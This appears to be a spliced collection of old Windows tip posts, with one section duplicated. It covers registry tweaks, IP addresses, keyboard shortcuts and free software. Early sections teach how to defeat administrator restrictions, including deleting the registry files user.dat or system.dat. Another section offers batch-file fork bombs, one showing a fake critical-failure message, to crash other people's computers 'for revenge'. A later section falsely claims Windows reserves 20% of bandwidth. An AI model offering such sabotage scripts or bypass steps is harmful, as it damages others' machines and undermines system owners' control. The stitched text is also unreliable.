Almost all system administrators make certain changes and make the system restricted. System Administrators can hide the RUN option, the FIND command, the entire Control Panel, drives in My Computer like D: A: etc. They can even restrict activities of a hacker my disabling or hiding, even the tiniest options or tools.

Most commonly these restrictions are imposed locally and are controlled by the Windows Registry. But sometimes the smart system administrators control the activities of the hacker by imposing restrictions remotely through the main server.

Poledit or Policy Editor is a small kewl tool which is being commonly used by system administrators to alter the settings of a system. This utility is not installed by default by Windows. You need to install in manually from the Windows 98 Installation Kit from the Resource Kit folder. user.dat file that we saw earlier.

The Policy Editor tool imposes restrictions on the user's system by editing the user.dat file which in turn means that it edits the Windows Registry to change the settings. It can be used to control or restrict access to each and every folder and option you could ever think of. It has the power to even restrict access to individual folders, files, the Control Panel, MS DOS, the drives available etc. Sometimes this software does make life really hard for a Hacker. So how can we remove the restrictions imposed by the Policy Editor? Well read ahead to learn more.

You see the Policy Editor is not the only way to restrict a user's activities. As we already know that the Policy Editor edits the Windows Registry(user.dat) file to impose such restrictions. So this in turn would mean that we can directly make changes to the Windows Registry using a .reg file or directly to remove or add restrictions.

Launch Regedit and go to the following Registry Key:

HKEY_CURRENT_USER/Software/Microsoft/CurrentVersion/Policies

Under this key, there will definitely be a key named explorer. Now under this explorer key we can create new DWORD values and modify it's value to 1 in order to impose the restriction. If you want to remove the Restriction, then you can simply delete the respective DWORD values or instead change their values to 0. The following is a list of DWORD values that can be created under the Explorer Key-:

NoDeletePrinter: Disables Deletion of already installed Printers

NoAddPrinter: Disables Addition of new Printers

NoRun : Disables or hides the Run Command

NoSetFolders: Removes Folders from the Settings option on Start Menu (Control Panel, Printers, Taskbar)

NoSetTaskbar: Removes Taskbar system folder from the Settings option on Start Menu

NoFind: Removes the Find Tool (Start >Find)

NoDrives: Hides and does not display any Drives in My Computer

NoNetHood: Hides or removes the Network Neighborhood icon from the desktop

NoDesktop: Hides all items including, file, folders and system folders from the Desktop

NoClose: Disables Shutdown and prevents the user from normally shutting down Windows.

NoSaveSettings: Means to say, 'Don't save settings on exit'

DisableRegistryTools: Disable Registry Editing Tools (If you disable this option, the Windows Registry Editor(regedit.exe) too

will not work.)

NoRecentDocsHistory: Removes Recent Document system folder from the Start Menu (IE 4 and above)

ClearRecentDocsOnExit: Clears the Recent Documents system folder on Exit.

Nolnternetlcon: Removes the Internet (system folder) icon from the Desktop

Under the same key: HKEY_CURRENT_USER/Software/Microsoft/CurrentVersion/Policies you can create new subkeys other than the already existing Explorer key. Now create a new key and name it System. Under this new key, system we can create the following new DWORD values(1 for enabling the particular option and 0 for disabling the particular option):

NODispCPL: Hides Control Panel

NoDispBackgroundPage: Hides Background page.

NoDispScrsavPage: Hides Screen Saver Page

NoDispAppearancePage: Hides Appearance Page

NoDispSettingsPage: Hides Settings Page

NoSecCPL: Disables Password Control Panel

NoPwdPage: Hides Password Change Page

NoAdminPaqe: Hides Remote Administration Page

NoProfilePage: Hides User Profiles Page

NoDevMgrPage: Hides Device Manager Page

NoConfigPage: Hides Hardware Profiles Page

NoFileSysPage: Hides File System Button

NoVirtMemPage: Hides Virtual Memory Button

Similarly, if we create a new subkey named Network, we can add the following DWORD values under it(1 for enabling the particular option and 0 for disabling the particular option):

NoNetSetupSecurityPage: Hides Network Security Page

NoNelSetup: Hides or disables the Network option in the Control Panel

NoNetSetupIDPage: Hides the Identification Page

NoNetSetupSecurityPage: Hides the Access Control Page

NoFileSharingControl: Disables File Sharing Controls

NoPrintSharing: Disables Print Sharing Controls

Similarly, if we create a new subkey named WinOldApp, we can add the following DWORD values under it(1 for enabling the particular option and 0 for disabling the particular option):

Disabled: Disable MS-DOS Prompt

NoRealMode: Disable Single-Mode MS-DOS.

So you see if you have access to the Windows Registry, then you can easily create new DWORD values and set heir value to 1 for enabling the particular option and 0 for disabling the particular option. But Sometimes, access to the Windows Registry is blocked. So what do you do? Go to the Windows Directory and delete either user.dat or system.dat (These 2 files constitute the Windows Registry.) and reboot. As soon as Windows logs in, it will display a Warning Message informing you about an error in the Windows Registry. Simply ignore this Warning Message and Press CTRL+DEL+ALT to get out of this warning message.(Do not press OK) You will find that all restrictions have been removed.

The most kind of restriction found quite commonly is the Specific Folder Restriction, in which users are not allowed access to specific folders, the most common being the Windows folder, or sometimes even access to My Computer is blocked. In effect, you simply cannot seem to access the important kewl files which are needed by you to do remove restrictions. What do you? Well use the RUN command. (START >RUN). But unfortunately a system administrator who is intelligent enough to block access to specific folder, would definitely have blocked access to the RUN command. Again we are stuck.

Windows is supposed to be the most User Friendly Operating System on earth. (At least Microsoft Says so.)

It gives the User an option to do the same thing in various ways. You see the RUN command is only the most convenient option of launching applications, but not the only way. In Windows you can create shortcuts to almost anything from a file, folder to a Web URL. So say your system administrator has blocked access to the c:\windows\system folder and you need to access it. What do you do? Simply create a Shortcut to it. To do this right click anywhere on the desktop and select New > Shortcut. A new window titled Create Shortcut pops up. Type in the path of the restricted folder you wish to access, in this case c:\windows\system. Click Next, Enter the friendly name of the Shortcut and then click Finish. Now you can access the restricted folder by simply double clicking on the shortcut icon. Well that shows how protected and secure *ahem Windows *ahem is.

****************

HACKING TRUTH: Sometimes when you try to delete a file or a folder, Windows displays an error message saying that the file is protected. This simply means that the file is write protected, or in other words the R option is +. Get it? Anyway, you can stop Windows from displaying this error message and straightaway delete this file by changing its attributes to Non Read Only. This can be done by Right Clicking on the file, selecting Properties and then

unselecting the Read Only Option.

***************

There is yet another way of accessing restricted folders. Use see, DOS has a lovely command known as START. Its general syntax is:

START application_path

It does do what it seems to do, start applications. So in you have access to DOS then you can type in the START command to get access to the restricted folder. Now mostly access to DOS too would be blocked. So again you can use the shortcut trick to launch, c:\command.com or c:\windows\command.com. (Command.com is the file which launches MS DOS).

Accessing Restricted Drives.

The problem with most system administrators is that they think that the users or Hackers too are stupid. Almost all system administrators use the Registry Trick (Explained Earlier) to hide all drives in My Computer. So in order to unhide or display all drives, simply delete that particular key.(Refer to beginning of Untold Secrets Section.)

Some systems have the floppy disk disabled through the BIOS. On those systems if the BIOS is protected, you may need to crack the BIOS password. (For that Refer to the Windows Hacking Chapter). Sometimes making drives readable (Removing R +) and then creating Shortcuts to them also helps us to get access to them.

Further Changing your Operating System's Looks by editing .htt files

If you have installed Windows Desktop Update and have the view as Web Page option enabled, you can customise the way the folder looks by selecting View > Customise this folder. Here you can change the background and other things about that particular folder. Well that is pretty lame, right? We hackers already know things as lame as that. Read on for some kewl stuff.

Well, you could also change the default that is stored in a Hidden HTML Template file (I think so..) which is nothing but a HTML document with a .htt extension. This .htt file is found at: %systemroot%\web\folder.htt.

The %systemroot% stands for the drive in which Windows is Installed, which is normally C:

You can edit these .htt files almost just like you edit normal .HTM or .HTML files. Simply open them in an ASCII editor like Notepad. The following is a list of .htt files on your system which control various folders and which can be edited to customise the way various folders look.

controlp.htt Control Panel

printers.htt Printers

mycomp.htt My Computer

safemode.htt Safe Mode

All these files are found in the web folder in %systemfolder%. The folder.htt file has a line:

'Here's a good place to add a few lines of your own"

which is the place where you can add your own A HREF links. These links would then appear in the folder whose folder.htt file you edited. All this might sound really easy and simple, but you see these .htt files do not contain normal HTML code, instead they contain a mixture of HTML and web bots. Hence they can be difficult for newbies to understand.

Well that's it for now, more tricks later, till then goodbye.

Want to Crash Windows Computer?? Check this

Who wants to take revenge on others windows Computer...

just copy below code in notepad and "Save as" any "asdsadasd.bat" or any filename (but ".bat" extension should be there if not it wont work)

Warning:- this will Open CMD 8 times . You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!!


@echo off
:a
Start
Start
Start
Start
Start
Start
Start
Start
goto :a

OR

@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START


Double click it and it will Crash the computer.

Warning:-
You cant stop it. SO DONT TRY IT ON YOUR COMPUTER!!! 


So How this Thing Work:-

in one milli second the first batch code executes 8 cmds.. its means in one second 8 * 100 = 800 cmds.. its a burden for a normal processor... so you cant stop by using task manager or by using any thing.. only one thing.. need to shut down the system... or Plug Pull

How to get your computer to have an FBI login screen!




1) Download LogonStudios here:

for XP:- http://www.mediafire.com/?ihdrmw7iaz4hken

for Win 7:- http://www.mediafire.com/?cwviyef2d744fzn

2) Install LogonStudios.

3) Download the FBI logon file here:

http://www.mediafire.com/?qhh05xsn7322q26

if you want other screens..
http://www.wincustomize.com/explore/all/...bi#/page/1

optional:- 4) Open Run and type gpedit.msc and press enter

->This should open the Group Policy Editor, now navigate to the following location in the editor
Local Computer Policy -> Administrative Templates -> System -> Logon

-> Here in the right side of the pane you should see an option “Hide entry points for Fast User Switching”

-> Right click on this option and set it to Enabled.

Switch User button should now be disabled from the Windows logon screen.

Chrome OS beta update brings 'immersive' mode, smarter app search and UI tweaks

If you're running Chrome OS betas like it's not even a thing, we're pegging you as a bit of a maverick. The latest update (29.0.1537.32) rewards your non-conformity with a bevy of small, but useful new features. There's Kernel 3.8 for the Pixel and Samsung 550 users, but likely you're more interested in the new "immersive" full screen mode that hides the shelf and tool bar. Or, what about the ability to pin apps to the shells with drag and drop? There's other tricks, too, such as wallpaper sync (across all your machines), UI scaling and a smarter app launcher. There's a full list at the source, but knowing you, you already went there, right?


How do I change my IP address?

Question

How do I change my IP address?

Answer

The basics

Before reading any of the below information, you need to be aware of some network basics.
  • Know the difference between a static IP address and a dynamic IP address. See each link for additional information about each of these terms.
  • When on the Internet, it is up to your Internet Service Provider (ISP) to assign and give you your network address seen by the Internet. When on a local network (LAN) or wide area network (WAN) the home or corporate router assigns the IP addresses.
  • If you're planning on designating or using a static IP address, you should be aware of how IP address ranges are handled and be familiar with the netmask. See each of these links for additional information.

Changing your Internet IP address

Modem users

When connecting to the Internet over a dial-up Modem, your ISP will assign your computer an address each time you connect. This means that often each time you connect you'll have a different IP address. If you're wanting to change your IP address, try disconnecting and reconnecting. If you're assigned the same address, disconnect for a few minutes and then reconncect.

Broadband users

Broadband service providers will assign your computer or home network a static IP address. If you're connected to a broadband network and need to change your IP address try following the below steps.

Disconnect power to broadband modem

Getting a new IP address may be as simple as disconnecting the power to your broadband modem. Disconnect the power from the modem and leave it disconnected for a few minutes. If you have a network router connected to the modem, we also suggest disconnecting the power to the router.

Release the IP address assigned to router

If disconnecting the power to the modem and router did not work it may still be saved in your router configuration. Try releasing and renewing the Internet IP Address for the router. Steps on how to do this can vary depending on the router. However, is often done through the Status or setup in the router setup.

Tip: The Internet IP Address is not the 192.168.xxx.xxx address.

How do I adjust the settings of my home router?

Leave it disconnected over night

If the above two suggestions do not work, disconnect the power to the modem and router (if applicable) and leave them disconnected overnight or for as long as possible.

Contact the ISP

Finally, if all of the above suggestions still prevent you from changing your IP address it's possible the ISP may have a long lease settings that prevents a new IP address from being assigned unless it is abandoned for days. In this situation, its usually easiest to contact the ISP to get the IP address changed.

Changing your home network IP address

Microsoft Windows users

To change or specify the IP address of your computer for your own local area network (LAN), follow the below steps. Keep in mind that if you're connecting to the Internet with a broadband connection, adjusting your network settings may cause issues with your broadband connection. Finally, if your home network is setup through a network router, that router could be assigning your computer dynamic IP addresses, and specifying a static IP address may cause issues.


  • Get to the Microsoft Windows desktop.
  • Right-click on My Network Places or Network Neighborhood and click Properties.
  • Right-click on Local Area Connection and click Properties.
  • Click Internet Protocol (TCP/IP) and click Properties. If this is not present, you'll need to install this protocol.
  • In the Internet Protocol (TCP/IP) Properties window, select "Use the following IP address" if not already selected and specify the new IP address you wish to use. While entering this data, you'll also need to specify the subnet mask and default gateway.

Linux users

The below information is for how to specify and adjust your network settings through the command prompt. Changing your network settings will require root access.
  • Get to the command prompt.
  • Move to the /etc/sysconfig/network directory.
  • Edit the interfaces file and adjust your network settings in this file.

Can someone else change my IP address?

Someone who's outside your home network and does not have access to your network router cannot change your IP address. Do not be concerned about your computers security if your IP address has changed, it's more likely that it's normal behavior than an attack.

How to log in directly to the Windows 8 desktop with Start8

Start8 can help you bypass the Windows 8 start screen and go directly to your desktop.

Early versions of Start8 required the user to choose a setting to enable automatic desktop. This post has been updated to reflect the changes to the latest version of Start8, which defaults to automatic desktop.

The start screen in Windows 8 has been a polarizing change from Windows 7, to put it mildly. If you click the desktop tile immediately after logging in, a free program by Stardock can save you some time. With Start8, you can automatically load the desktop immediately after logging in to Windows 8. Start8 will even add back the Windows Start button.

To use Start8 to bypass the Windows 8 start screen, go to Stardock's Web site and sign up with your e-mail address to get the download link. Previous versions of Start8 did not enable automatic desktop by default, but the latest version takes you straight to the desktop without any further action.

If for some reason you prefer not to go straight to the desktop, right-click on the Start button, then select Configure Start8. In the Control section, uncheck "Automatically go to the Desktop when I sign in."



How to boot directly to the desktop in Windows 8.1

Windows 8.1 has some new features, including bypassing the Start screen at login, so you can go straight to the desktop. We'll show you how to enable it.






The Windows 8 Start screen is a good starting point for Windows 8 devices with touch screens, but on PCs with standard screens, you might prefer to boot directly to the desktop. Previously, you could bypass the Windows 8 Start screen with Start8, but Windows 8.1 now lets you do it natively. Here's how:

Step 1: Right-click on the Windows 8.1 taskbar, then choose Properties.

Step 2: Click on the Navigation tab, then under the Start screen section, check the box next to "Go to the desktop instead of Start when I sign in."


 

Top 10 free PC programs everyone should have

Top 10 free PC programs everyone should have


There are millions of free and open source projects available, many of them better than any commercially available product. Below is a short listing of what we think is the best out there, broken down into ten categories.
antivirus and malware protection
Most PC users realize that they need protection on their computer or may have an installed antivirus program from their computer manufacturer. What most don't realize is that there are free programs that are just as good and in some cases better than the commercial products. Below are our recommendations
antivirus program: Avast! or AVG
Malware and Spyware protection: Malwarebytes
Backup solutions
There are dozens of free and commercially available backup programs for computers. Unfortunately many of those backups are stored locally, meaning if your house were to catch fire, get robbed, or if you lost your backup discs all your data would be lost. This is why when dealing with important data we suggest users use online backup services.
Online backup solution: Mozy or Dropbox
Browsers
Although Microsoft Internet Explorer comes pre-installed on Windows computers. There are several excellent free alternatives that everyone should try. These free alternatives can often be faster, have more options, and in many cases be more secure than Internet Explorer.
Internet Browser: Mozilla Firefox or Google Chrome
Compression utility
When downloading files on the Internet you'll eventually encounter a .zip, .rar, or other compressed file. Dealing with these files can be easy with our below free file compression utility.
File compression utility: 7-Zip
Disc ripper and creation utility
Creating an audio or data CD/DVD, ripping the data from an audio CD, or creating a CD from a .ISO file can also be done freely using our below free recommendation.
CD burner utility: CDBurnerXP
E-mail
E-mail is yet another service that can be done freely. Most users today use online e-mail solutions like the one listed below. However, for those still using an e-mail client such as Microsoft Outlook we strongly suggest one or both of the below suggestions.
E-mail client: Mozilla Thunderbird
Online e-mail: Gmail
FTP, SFTP, and SSH Utility
Users who maintain their own web page or need to upload or download files to or from a server will have to use an FTP utility or a SSH client. There are many commercial programs capable of doing this but our below free recommendations beats them all.
FTP client: Filezilla
SSH client: Putty
Image editor, paint program, and picture organizer
There are many great free solutions for editing, creating, and organizing your images on your computer. Many of the programs capable of doing these tasks can be several hundred dollars, but all of the below programs are completely free.
Image editor: GIMP
Paint program: Paint.net
Picture organizer: Google Picasa
Multimedia
There are dozens of different multimedia programs with different capabilities and limitations. Below are our top free multimedia programs for watching video files and recording audio.
Audio editing and creating tool: Audacity
Video and DVD Player: VLC
Office Suite
An Office suite such as Microsoft Office is often one of the most expensive programs that a user can install on their computer. Why install these expensive programs when there are free solutions that are just as good.
Office suite: OpenOffice
Notepad and Source code editor: Notepad++

How to get your computer to have an FBI login screen!






1) Download LogonStudios here:

for XP:- http://www.mediafire.com/?ihdrmw7iaz4hken

for Win 7:- http://www.mediafire.com/?cwviyef2d744fzn

2) Install LogonStudios.

3) Download the FBI logon file here:

http://www.mediafire.com/?qhh05xsn7322q26

if you want other screens..
http://www.wincustomize.com/explore/all/...bi#/page/1

optional:- 4) Open Run and type gpedit.msc and press enter

->This should open the Group Policy Editor, now navigate to the following location in the editor
Local Computer Policy -> Administrative Templates -> System -> Logon

-> Here in the right side of the pane you should see an option “Hide entry points for Fast User Switching”

-> Right click on this option and set it to Enabled.

Switch User button should now be disabled from the Windows logon screen.

That's pretty much it, enjoy ! Laughing

Speed up your Internet by 20% | For Sure

Speed up your internet by 20%

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc.
You can get it back:

Click Start then Run and type

gpedit.msc ” without quotes.
[Image: 108ffyh.png]
This opens the group policy editor.

Then go to:
–> Local Computer Policy
–> Computer Configuration
Image has been scaled down 16% (650x457). Click this bar to view original image (768x539). Click image to open in new window.
[Image: nve73k.png]


–> Administrative Templates
Image has been scaled down 16% (650x454). Click this bar to view original image (768x536). Click image to open in new window.
[Image: 2agiu6g.png]


–> Network
Image has been scaled down 15% (650x454). Click this bar to view original image (764x533). Click image to open in new window.
[Image: 2iu6dm1.png]


–> QOS Packet Scheduler
Image has been scaled down 16% (650x453). Click this bar to view original image (770x536). Click image to open in new window.
[Image: 1zd2gcm.png]


–> Limit Reservable Bandwidth.
Image has been scaled down 16% (650x452). Click this bar to view original image (771x535). Click image to open in new window.
[Image: drch2x.png]


Double click on Limit Reservable bandwidth.

It will say it is not configured, but the truth is, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default.
Image has been scaled down 8% (650x597). Click this bar to view original image (699x641). Click image to open in new window.
[Image: fvzivo.png]


So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.
Image has been scaled down 8% (650x596). Click this bar to view original image (700x641). Click image to open in new window.
[Image: n4xzyv.png]


It works on Win xp and Win 7 as well.

General Tricks

Many hardcore computer users might think themselves above learning new tricks, but there's always new things to learn that will help improve your skills. Our bet: you will find at least one useful thing here that you didn't know before.
Inspired and with the help of this AskReddit discussion, we’ve compiled some of the most handy computer tricks you might not be taking advantage of. Our ultimate goal is to help you become more productive by shaving valuable seconds off your workflow. Of course, you can always pass along these tips to your not-so-savvy friends and family members to help them become better PC users as well.

General Tricks


Windows hidden "god mode" folder Windows offers a centralized Control Panel for all of the OS settings, which makes it easy for users to tweak everything from desktop background to setting up a VPN. To enter this mode, create a new folder with this exact name (copy and paste it): God Mode.{ED7BA470-8E54-465E-825C-99712043E01C}. The folder icon will change to a Control Panel-style icon, and you will be able to jump in and change all kinds of settings. Note: Don't try this on Windows Vista 64-bit as it's known to cause a reboot loop.




Use Problem Steps Recorder This handy tool automatically records any mouse clicks and takes screenshots for you. If you need tech assistance with your computer, go to Run by typing Windows + R, and then type "psr." Use the tool and by the time you are finished, you can send this information, neatly compiled automatically, to the person helping you with the issue. It will make the process of finding the problem much easier for them, which means you will be able to get your system up and running faster.

Find/Delete large files wasting space A handy tool called WinDirStat (Windows Directory Statistics) can be used to easily find which files and folders are taking up the most space on your drive. From there, you can delete them and open up a ton of storage space.







Reduce the number of programs running at startup If your PC is taking too long to boot, it’s probably because you have far too many programs running at startup. Reducing this is easy, it will make your PC launch noticeably faster and lighter upon first load. To change the items running at startup, go to Run using the hotkey Windows key + R, and type "msconfig." A small window will appear (see the screenshot below), select the Startup tab. From here you will be able to turn off many startup programs, which can shave several seconds (or minutes) off your boot time. (Note Windows 8 has moved this functionality to the Task Manager). Try to make sure you research what you are turning off as some processes might be needed by third party programs or drivers you have installed.






Cloud backup important files If you’re working on a critical paper for school, work, or any other major project, make sure you are backing up the file not just locally. You can use services like Dropbox, Google Drive, or any of the other popular cloud storage solution which will do the legwork for you on the background. Of course, you can also throw the files on a thumb drive or external HDD just to be safe but backing up to the cloud can be done seamlessly which is twice the advantage.






Typing Tricks


Delete an entire word Instead of deleting a single letter, pressing CTRL + BKSP will delete the entire word behind the cursor. This makes deleting text quicker if you screw up a whole word.

Move Cursor to beginning of the next or previous word Moving the cursor around manually while typing is a great way to make your work take longer than it needs to. To speed of the process, move the cursor around with keyboard shortcuts. To move it to the beginning of the previous word, use CTRL + Left Arrow. To move it to the beginning of the next word, use CTRL + Right Arrow. In OS X you can accomplish the same using the Option key.

Making sub and superscript text If you need to make sub or superscript text (think exponents for superscript), press CTRL + = for subscript and CTRL + SHIFT + = for superscript.

Paste plain text of what was copied When you copy text from any source, programs will usually copy any formatting that comes with it. To paste this as plain text, press CTRL + Shift + V instead of the standard CTRL + V, and the system will paste unformatted text.

Note that many programs follow this parameter (Chrome, Firefox, etc.) but not all, particularly Microsoft programs like Word or Outlook. For those there's a few alternatives that go beyond copying and pasting in Notepad: 1) CTRL + ALT + V will show a 'paste special' dialog box. 2) CTRL + Spacebar will remove formatting in already pasted text. 3) Download Puretext and choose a hotkey to always paste plain text with it.







Keyboard Shortcuts


Copy only active window to clipboard Normally, the Print Screen key copies the entire display (or two displays if you got them), ALT + Print Screen only copies the currently active window to the clipboard. Whether taking a screenshot to diagnose a problem, or just because you want to show something to a friend, this will come in handy.

Fix those little mistakes Did you know you can undo almost any action? CTRL + Z is the ultimate hot key, and for sure you knew about it already, however note that undo doesn’t just apply to typing. If you accidentally delete or move a file, you can hit CTRL + Z to bring it right back to where it was. In Chrome and Firefox you can also undo closing a tab using CTRL + SHIFT + T.

Cycle through open windows Pressing ALT+TAB allows you to cycle through currently open windows. This makes switching back and forth between running processes quick and painless. If you want a more stylish method of cycling through open programs, Windows + TAB will do the job for you.

Interrupt all processes CTRL + ALT + Delete is one of the most common PC shortcuts, and one almost everyone is familiar with. The important thing to note is that it interrupts all processes, including the one that is bogging down your system, which can mean the difference between needing to restart or not.







Close the current program Typing ALT + F4 will close the program that is running. This is useful as it saves you time mousing over the "X" and clicking. People will often use this as a joke, telling you to press ALT + F4 to fix a problem. Don’t fall for it unless you want to close what you are doing.

Minimize all windows Sometimes you have a bunch of stuff running, and you want it all to go away so you can get to the desktop. Simply pressing Windows + D will minimize everything you have up, which will save you some time pressing the minimize button for each window. It should be noted that Windows + M offers similar functionality, but there is no undoing, so Windows + D is the more favorable approach.

Open the task manager directly If you want to bypass the interrupt that happens when pressing CTRL + ALT + DEL and jump right to the task manager, typing CTRL + Shift + ESC launches it directly.

Close the current window/tab Stick of moving all the way to that X button? Press CTRL + W and the current window will close. (Don’t do it now, or you will miss the rest of the tricks!)

Bring up the system information window This is so much quicker than digging this out the traditional way... Just press Windows + Pause/Break and the System Information panel will be ready to go. This might be the only use for the Pause/Break key you will ever find, so enjoy it!







Better multiple monitor control There are several useful keyboard shortcuts for controlling open windows on multiple monitors. Pressing the Windows Key + Arrow Keys will cause a window to quickly snap to each side of either monitor. Alternatively, hitting Shift + Windows Key + Arrows will cause the window to jump to the other monitor. Lastly, pressing Windows + P will allow you to quickly set up a second display or projector.







Automatically add www. and .com to a URL You can shave off a couple of seconds typing in a URL by simply click CTRL + Enter after you type the name of the site. Need .net instead of .com, press CTRL + Shift + Enter instead.


Jump to address bar There are a number of ways to jump right to the address bar from anywhere in browser. Pressing CTRL + L, F6, and ALT + D all accomplish this goal.

Bring back a closed tab We covered this already, but it's super useful. Accidentally closed a tab? Simply press CTRL + Shift + T to reopen the most recently closed tab and get back to what you were doing.

Use private browsing The uses for not having cookies and history saved are obvious for certain activities, you know, like shopping for gifts on a shared computer (of course!). Pressing CTRL + Shift + N will launch a new private in Chrome, CTRL + Shift + P will do it in Firefox and Internet Explorer.








Cycle through open tabs Pressing CTRL + TAB while in a browser will flip between each one. This can be much faster than moving the mouse and clicking on a tab. CTRL + NUM (1, 2, 3, 4, n..) will also take you to certain tab in that numeric order.

File Management Tricks


Rename a file quickly Right-clicking and selecting rename is not very efficient. Instead, simply press F2 while a file is selected to change its name. To alter the name of another file, type TAB without deselecting the current file.

Rename files sequentially in Windows You actually don’t need to download any programs to perform a batch file rename in Windows. Instead, you can select all the files you want to change, right-click the first one in the list, select rename (or use F2), and type in the name. This will automatically change all the other files with the same root name with a suffix: (1), (2), and so on.


Select multiple files using the keyboard To select a bunch of files using your keyboard, you can press Shift + down arrow to select a single file or Shift + Page Down to select a large group of files at one time.

Security Tips


Run programs on an infected PC Often times, malware will prevent a computer from running certain programs. Changing the name of the .exe file can often override this. If that doesn’t work, changing the extension to .com is another useful alternative, and the program will still be able to run in spite of the extension change.

Read installers Even major programs can install toolbars and other unwanted pieces of software during installation. Take a few seconds to read each step to make sure you are not agreeing to install something other than the program you were actually seeking. Far too often people just push next over and over, and end up with a browser covered in various search bars that just aren't needed. In the worst of scenarios, these can have nefarious intentions.

Lock your computer if you get up Sick of your "friends" going onto your computer at work or home and posting things on your Facebook/Twitter page on your behalf? It’s certainly an annoyance, but an easy one to prevent. Windows + L will lock your system right away, requiring a password (if you've set one) to log in again.








Program-Specific Tricks


Photoshop: Drag the marquee without losing the ability to size it The marquee tool is, at its most basic level, designed for selecting a part of an image. It’s used constantly in Photoshop, and there is a handy trick many users miss. While dragging it around, you can press space, which will allow you to size it while moving it. This saves time by letting your perform two key functions at the same time.
Steam: Move games to another drive or partition By default, Steam installs all games to the same HDD or partition, but what happens if that fills up? The solution: download Steamtool Library Manager. It makes it easy to move games to another hard drive without messing with the functionality of Steam.







VLC: Fix unsynced audio and subtitles In the popular media player VLC, if your audio loses sync with the video or subtitles, there is an easy way to fix this. Simply pressing J or K will move the audio forward or backwards. Similarly, to sync the subtitles you can press H or G.






The combination of using these tips and tricks on a daily basis will most certainly make your computer life much more enjoyable, or at least more practical. And so, did you learn a thing or two that you didn't know before?